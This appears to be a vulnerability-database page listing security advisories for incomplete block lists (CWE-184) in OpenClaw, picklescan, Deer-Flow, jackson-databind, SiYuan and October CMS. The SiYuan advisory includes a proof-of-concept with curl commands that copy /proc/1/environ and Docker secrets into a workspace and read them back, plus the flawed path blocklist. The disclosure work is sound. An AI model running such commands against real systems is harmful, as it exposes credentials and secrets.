Common Weakness Enumeration

CWE-184

Allowed

Incomplete List of Disallowed Inputs

Abstraction: Base · Status: Draft

The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.

307 vulnerabilities reference this CWE, most recent first.

GHSA-G796-JQMX-WF9Q

Vulnerability from github – Published: 2026-06-16 21:32 – Updated: 2026-06-18 14:52
VLAI
Summary
Duplicate Advisory: macOS Swift exec allowlist missed combined POSIX inline flags
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-c226-q6fx-6j6c. This link is maintained to preserve external references.

Original Description

OpenClaw before 2026.5.6 contains an allowlist bypass vulnerability in the macOS Swift exec feature that misses combined POSIX inline-command flags. Attackers can execute shell content outside the intended allowlist check by using combined flag forms, potentially allowing unauthorized command execution depending on operator configuration.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2026.5.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T14:52:17Z",
    "nvd_published_at": "2026-06-16T19:17:04Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of\u00a0GHSA-c226-q6fx-6j6c. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw before 2026.5.6 contains an allowlist bypass vulnerability in the macOS Swift exec feature that misses combined POSIX inline-command flags. Attackers can execute shell content outside the intended allowlist check by using combined flag forms, potentially allowing unauthorized command execution depending on operator configuration.",
  "id": "GHSA-g796-jqmx-wf9q",
  "modified": "2026-06-18T14:52:17Z",
  "published": "2026-06-16T21:32:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c226-q6fx-6j6c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53861"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-combined-posix-inline-flags-on-macos"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: macOS Swift exec allowlist missed combined POSIX inline flags",
  "withdrawn": "2026-06-18T14:52:17Z"
}

GHSA-G7VJ-QW6X-G3P8

Vulnerability from github – Published: 2026-06-23 15:32 – Updated: 2026-06-23 15:32
VLAI
Details

picklescan before 1.0.4 fails to block at least seven Python standard library modules (including uuid, _osx_support, _aix_support, _pyrepl.pager, and imaplib) exposing eight functions that provide direct arbitrary command execution. Attackers can craft malicious pickle files importing these unblocked modules to achieve remote code execution while bypassing picklescan's safety validation entirely.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-56315"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-23T13:16:45Z",
    "severity": "CRITICAL"
  },
  "details": "picklescan before 1.0.4 fails to block at least seven Python standard library modules (including uuid, _osx_support, _aix_support, _pyrepl.pager, and imaplib) exposing eight functions that provide direct arbitrary command execution. Attackers can craft malicious pickle files importing these unblocked modules to achieve remote code execution while bypassing picklescan\u0027s safety validation entirely.",
  "id": "GHSA-g7vj-qw6x-g3p8",
  "modified": "2026-06-23T15:32:36Z",
  "published": "2026-06-23T15:32:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-g38g-8gr9-h9xp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56315"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/picklescan-remote-code-execution-via-unblocked-standard-library-modules"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-GWQP-86Q6-W47G

Vulnerability from github – Published: 2026-03-02 22:30 – Updated: 2026-03-18 01:30
VLAI
Summary
OpenClaw's exec allow-always can be bypassed via unrecognized multiplexer shell wrappers (busybox/toybox sh -c)
Details

Summary

OpenClaw exec approvals could be bypassed in allowlist mode when allow-always was granted through unrecognized multiplexer shell wrappers (notably busybox sh -c and toybox sh -c).

Affected Packages / Versions

  • Package: openclaw (npm)
  • Affected: <= 2026.2.22-2
  • Latest published vulnerable version at triage time: 2026.2.22-2 (checked on February 24, 2026)
  • Fixed on main: yes
  • Patched release: 2026.2.23

Details

Wrapper analysis treated busybox/toybox invocations as non-wrapper commands in this path, so allow-always persisted the wrapper binary path instead of the inner executable. That allowed later arbitrary payloads under the same multiplexer wrapper to satisfy the stored allowlist rule.

The fix hardens wrapper detection and persistence behavior for these multiplexer shell applets so approvals bind to intended inner executables and fail closed when unwrap safety is uncertain.

Fix Commit(s)

  • a67689a7e3ad494b6637c76235a664322d526f9e

Release Process Note

patched_versions is pre-set to the released version (2026.2.23). This advisory now reflects released fix version 2026.2.23.

OpenClaw thanks @jiseoung for reporting.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.2.23"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22175"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-02T22:30:43Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nOpenClaw exec approvals could be bypassed in `allowlist` mode when `allow-always` was granted through unrecognized multiplexer shell wrappers (notably `busybox sh -c` and `toybox sh -c`).\n\n### Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `\u003c= 2026.2.22-2`\n- Latest published vulnerable version at triage time: `2026.2.22-2` (checked on February 24, 2026)\n- Fixed on `main`: yes\n- Patched release: `2026.2.23`\n\n### Details\nWrapper analysis treated `busybox`/`toybox` invocations as non-wrapper commands in this path, so `allow-always` persisted the wrapper binary path instead of the inner executable. That allowed later arbitrary payloads under the same multiplexer wrapper to satisfy the stored allowlist rule.\n\nThe fix hardens wrapper detection and persistence behavior for these multiplexer shell applets so approvals bind to intended inner executables and fail closed when unwrap safety is uncertain.\n\n### Fix Commit(s)\n- `a67689a7e3ad494b6637c76235a664322d526f9e`\n\n### Release Process Note\n`patched_versions` is pre-set to the released version (`2026.2.23`). This advisory now reflects released fix version `2026.2.23`.\n\nOpenClaw thanks @jiseoung for reporting.",
  "id": "GHSA-gwqp-86q6-w47g",
  "modified": "2026-03-18T01:30:11Z",
  "published": "2026-03-02T22:30:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gwqp-86q6-w47g"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/a67689a7e3ad494b6637c76235a664322d526f9e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw\u0027s exec allow-always can be bypassed via unrecognized multiplexer shell wrappers (busybox/toybox sh -c)"
}

GHSA-GXX6-2VWG-3GC3

Vulnerability from github – Published: 2026-04-01 15:31 – Updated: 2026-05-12 03:31
VLAI
Details

ByteDance Deer-Flow versions prior to commit 92c7a20 contain a sandbox escape vulnerability in bash tool handling that allows attackers to execute arbitrary commands on the host system by bypassing regex-based validation using shell features such as directory changes and relative paths. Attackers can exploit the incomplete shell semantics modeling to read and modify files outside the sandbox boundary and achieve arbitrary command execution through subprocess invocation with shell interpretation enabled.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-34430"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-01T14:16:52Z",
    "severity": "HIGH"
  },
  "details": "ByteDance Deer-Flow versions prior to commit 92c7a20 contain\u00a0a sandbox escape vulnerability in bash tool handling that allows attackers to execute arbitrary commands on the host system by bypassing regex-based validation using shell features such as directory changes and relative paths. Attackers can exploit the incomplete shell semantics modeling to read and modify files outside the sandbox boundary and achieve arbitrary command execution through subprocess invocation with shell interpretation enabled.",
  "id": "GHSA-gxx6-2vwg-3gc3",
  "modified": "2026-05-12T03:31:26Z",
  "published": "2026-04-01T15:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34430"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bytedance/deer-flow/pull/1547"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bytedance/deer-flow/commit/92c7a20cb74addc3038d2131da78f2e239ef542e"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/bytedance-deerflow-localsandboxprovider-host-bash-escape"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-H592-38CM-4GGP

Vulnerability from github – Published: 2018-10-18 17:42 – Updated: 2024-03-15 01:13
VLAI
Summary
jackson-databind vulnerable to deserialization flaw leading to unauthenticated remote code execution
Details

jackson-databind in versions prior to 2.8.11 and 2.9.4 contain a deserialization flaw which allows an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525, blacklisting additonal vulnerable classes.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.8.0"
            },
            {
              "fixed": "2.8.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.9.0"
            },
            {
              "fixed": "2.9.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.6.7.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.7.0"
            },
            {
              "fixed": "2.7.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-15095"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:38:56Z",
    "nvd_published_at": "2018-02-06T15:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "jackson-databind in versions prior to 2.8.11 and 2.9.4 contain a deserialization flaw which allows an unauthenticated user to perform code execution by sending maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525, blacklisting additonal vulnerable classes.",
  "id": "GHSA-h592-38cm-4ggp",
  "modified": "2024-03-15T01:13:58Z",
  "published": "2018-10-18T17:42:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15095"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/issues/1680"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/issues/1737"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/a054585e2175ad0882f07bcafedecfac86230f1b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/a3939d36edcc755c8af55bdc1969e0fa8438f9db"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/ddfddfba6414adbecaff99684ef66eebd3a92e92"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/e865a7a4464da63ded9f4b1a2328ad85c9ded78b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1aac9b82eee907e0f0c3abbdea723a935"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tolbertam/jackson-databind/commit/80566a0f96b2003863f9d8f9ccc3b562001e147b"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2017:3189"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20171214-0003"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20200401000000*/http://www.securityfocus.com/bid/103880"
    },
    {
      "type": "WEB",
      "url": "https://web.archive.org/web/20201221192044/http://www.securitytracker.com/id/1039769"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2017/dsa-4037"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2017:3190"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:0342"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:0478"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:0479"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:0480"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:0481"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:0576"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:0577"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:1447"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:1448"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:1449"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:1450"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:1451"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2018:2927"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:2858"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:3149"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2019:3892"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FasterXML/jackson-databind"
    },
    {
      "type": "WEB",
      "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html"
    },
    {
      "type": "WEB",
      "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
    },
    {
      "type": "WEB",
      "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "jackson-databind vulnerable to deserialization flaw leading to unauthenticated remote code execution"
}

GHSA-H5VH-M7FG-W5H6

Vulnerability from github – Published: 2026-03-16 18:46 – Updated: 2026-03-30 13:58
VLAI
Summary
SiYuan globalCopyFiles: incomplete sensitive path blocklist allows reading /proc and Docker secrets
Details

Summary

POST /api/file/globalCopyFiles reads source files using filepath.Abs() with no workspace boundary check, relying solely on util.IsSensitivePath() whose blocklist omits /proc/, /run/secrets/, and home directory dotfiles. An admin can copy /proc/1/environ or Docker secrets into the workspace and read them via the standard file API.

Details

File: kernel/api/file.go - function globalCopyFiles

for i, src := range srcs {
    absSrc, _ := filepath.Abs(src)

    if util.IsSensitivePath(absSrc) {
        return
    }
    srcs[i] = absSrc
}
destDir := filepath.Join(util.WorkspaceDir, destDir)
for _, src := range srcs {
    dest := filepath.Join(destDir, filepath.Base(src))
    filelock.Copy(src, dest)   // copies unchecked sensitive file into workspace
}

IsSensitivePath blocklist (kernel/util/path.go):

prefixes := []string{"/etc/ssh", "/root", "/etc", "/var/lib/", "/."}

Not blocked - exploitable targets: | Path | Contains | |------|----------| | /proc/1/environ | All env vars: DATABASE_URL, AWS_ACCESS_KEY_ID, ANTHROPIC_API_KEY | | /run/secrets/* | Docker Swarm / Compose injected secrets | | /home/siyuan/.aws/credentials | AWS credentials (non-root user) | | /home/siyuan/.ssh/id_rsa | SSH private key (non-root user) | | /tmp/ | Temporary files including tokens |

PoC

Environment:

docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123

Exploit:

TOKEN="YOUR_ADMIN_TOKEN"

curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"srcs":["/proc/1/environ"],"destDir":"data/assets/"}'

curl -s -X POST http://localhost:6806/api/file/getFile \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"path":"/data/assets/environ"}' | tr '\0' '\n'

Docker secrets:

curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"srcs":["/run/secrets/db_password","/run/secrets/api_token"],"destDir":"data/assets/"}'

Impact

An admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260313024916-fd6526133bb3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32747"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-16T18:46:14Z",
    "nvd_published_at": "2026-03-19T21:17:10Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nPOST /api/file/globalCopyFiles reads source files using filepath.Abs() with no workspace boundary check, relying solely on util.IsSensitivePath() whose blocklist omits /proc/, /run/secrets/, and home directory dotfiles. An admin can copy /proc/1/environ or Docker secrets into the workspace and read them via the standard file API.\n\n### Details\nFile: kernel/api/file.go - function globalCopyFiles\n\n```go\nfor i, src := range srcs {\n    absSrc, _ := filepath.Abs(src)\n\n    if util.IsSensitivePath(absSrc) {\n        return\n    }\n    srcs[i] = absSrc\n}\ndestDir := filepath.Join(util.WorkspaceDir, destDir)\nfor _, src := range srcs {\n    dest := filepath.Join(destDir, filepath.Base(src))\n    filelock.Copy(src, dest)   // copies unchecked sensitive file into workspace\n}\n```\n\nIsSensitivePath blocklist (kernel/util/path.go):\n```go\nprefixes := []string{\"/etc/ssh\", \"/root\", \"/etc\", \"/var/lib/\", \"/.\"}\n```\n\n**Not blocked - exploitable targets:**\n| Path | Contains |\n|------|----------|\n| /proc/1/environ | All env vars: DATABASE_URL, AWS_ACCESS_KEY_ID, ANTHROPIC_API_KEY |\n| /run/secrets/* | Docker Swarm / Compose injected secrets |\n| /home/siyuan/.aws/credentials | AWS credentials (non-root user) |\n| /home/siyuan/.ssh/id_rsa | SSH private key (non-root user) |\n| /tmp/ | Temporary files including tokens |\n\n### PoC\n**Environment:**\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n  -v $(pwd)/workspace:/siyuan/workspace \\\n  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```bash\nTOKEN=\"YOUR_ADMIN_TOKEN\"\n\ncurl -s -X POST http://localhost:6806/api/file/globalCopyFiles \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"srcs\":[\"/proc/1/environ\"],\"destDir\":\"data/assets/\"}\u0027\n\ncurl -s -X POST http://localhost:6806/api/file/getFile \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"path\":\"/data/assets/environ\"}\u0027 | tr \u0027\\0\u0027 \u0027\\n\u0027\n```\n\n**Docker secrets:**\n```bash\ncurl -s -X POST http://localhost:6806/api/file/globalCopyFiles \\\n  -H \"Authorization: Token $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"srcs\":[\"/run/secrets/db_password\",\"/run/secrets/api_token\"],\"destDir\":\"data/assets/\"}\u0027\n```\n\n### Impact\nAn admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.",
  "id": "GHSA-h5vh-m7fg-w5h6",
  "modified": "2026-03-30T13:58:13Z",
  "published": "2026-03-16T18:46:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-h5vh-m7fg-w5h6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32747"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/9914fd1d39e5f0a8dcc9fb587e1c0b46f31490a1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan globalCopyFiles: incomplete sensitive path blocklist allows reading /proc and Docker secrets"
}

GHSA-H6JM-F4HH-FW27

Vulnerability from github – Published: 2026-04-21 16:44 – Updated: 2026-04-24 21:08
VLAI
Summary
October CMS has Safe Mode Bypass via Twig Database Write Operations
Details

A vulnerability was identified in the Twig sandbox security policy that allowed database write operations when cms.safe_mode is enabled. Backend users with Developer permissions could use Twig template markup to execute insert, update, and delete operations on any database table through the query builder, which is included in the sandbox allow-list.

Impact

  • Arbitrary database writes including modification or deletion of any table
  • Requires authenticated backend access with Developer permissions
  • Only relevant when cms.safe_mode is enabled (otherwise direct PHP injection is already possible)

Patches

The vulnerability has been patched in v3.7.14 and v4.1.10. Write operations such as insert, update, delete, and truncate are now blocked on query builder and model objects within the Twig sandbox. All users are encouraged to upgrade to the latest patched version.

Workarounds

If upgrading immediately is not possible: - Restrict Developer tool access to fully trusted administrators only

Reporter

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "october/october"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.7.14"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "october/october"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.1.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26274"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-21T16:44:19Z",
    "nvd_published_at": "2026-04-21T17:16:30Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was identified in the Twig sandbox security policy that allowed database write operations when `cms.safe_mode` is enabled. Backend users with Developer permissions could use Twig template markup to execute insert, update, and delete operations on any database table through the query builder, which is included in the sandbox allow-list.\n\n### Impact\n- Arbitrary database writes including modification or deletion of any table\n- Requires authenticated backend access with Developer permissions\n- Only relevant when `cms.safe_mode` is enabled (otherwise direct PHP injection is already possible)\n\n### Patches\nThe vulnerability has been patched in v3.7.14 and v4.1.10. Write operations such as `insert`, `update`, `delete`, and `truncate` are now blocked on query builder and model objects within the Twig sandbox. All users are encouraged to upgrade to the latest patched version.\n\n### Workarounds\nIf upgrading immediately is not possible:\n- Restrict Developer tool access to fully trusted administrators only\n\n### Reporter\n- Reported by [Chris Alupului](https://github.com/neosprings)",
  "id": "GHSA-h6jm-f4hh-fw27",
  "modified": "2026-04-24T21:08:44Z",
  "published": "2026-04-21T16:44:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/octobercms/october/security/advisories/GHSA-h6jm-f4hh-fw27"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26274"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/octobercms/october"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "October CMS has Safe Mode Bypass via Twig Database Write Operations"
}

GHSA-H7RF-PV8C-84MG

Vulnerability from github – Published: 2026-07-14 00:31 – Updated: 2026-07-14 00:31
VLAI
Details

OpenClaw versions before 2026.6.1 contain a flaw in host exec environment filtering that could allow Git ext transport to be abused. When the affected feature is enabled and reachable, a lower-trust caller or configured input path could execute or persist actions beyond the caller's intended authorization.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-62200"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-13T22:16:51Z",
    "severity": "HIGH"
  },
  "details": "OpenClaw versions before 2026.6.1 contain a flaw in host exec environment filtering that could allow Git ext transport to be abused. When the affected feature is enabled and reachable, a lower-trust caller or configured input path could execute or persist actions beyond the caller\u0027s intended authorization.",
  "id": "GHSA-h7rf-pv8c-84mg",
  "modified": "2026-07-14T00:31:04Z",
  "published": "2026-07-14T00:31:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9969-8g9h-rxwm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-62200"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-git-ext-transport"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
